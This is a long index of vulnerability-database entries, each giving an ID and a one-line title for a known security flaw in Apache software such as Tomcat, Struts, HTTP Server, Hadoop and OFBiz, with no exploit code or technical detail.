| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
| [86901] Apache Tomcat Error Message Path Disclosure
| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
| [85430] Apache mod_pagespeed Module Unspecified XSS
| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
| [85249] Apache Wicket Unspecified XSS
| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
| [83339] Apache Roller Blogger Roll Unspecified XSS
| [83270] Apache Roller Unspecified Admin Action CSRF
| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
15678| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
15679| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
15680| [60232] PHP on Apache php.exe Direct Request Remote DoS
15681| [60176] Apache Tomcat Windows Installer Admin Default Password
15682| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
15683| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
15684| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
15685| [59944] Apache Hadoop jobhistory.jsp XSS
15686| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
15687| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
15688| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
15689| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
15690| [59019] Apache mod_python Cookie Salting Weakness
15691| [59018] Apache Harmony Error Message Handling Overflow
15692| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
15693| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
15694| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
15695| [59010] Apache Solr get-file.jsp XSS
15696| [59009] Apache Solr action.jsp XSS
15697| [59008] Apache Solr analysis.jsp XSS
15698| [59007] Apache Solr schema.jsp Multiple Parameter XSS
15699| [59006] Apache Beehive select / checkbox Tag XSS
15700| [59005] Apache Beehive jpfScopeID Global Parameter XSS
15701| [59004] Apache Beehive Error Message XSS
15702| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
15703| [59002] Apache Jetspeed default-page.psml URI XSS
15704| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
15705| [59000] Apache CXF Unsigned Message Policy Bypass
15706| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
15707| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
15708| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
15709| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
15710| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
15711| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
15712| [58993] Apache Hadoop browseBlock.jsp XSS
15713| [58991] Apache Hadoop browseDirectory.jsp XSS
15714| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
15715| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
15716| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
15717| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
15718| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
15719| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
15720| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
15721| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
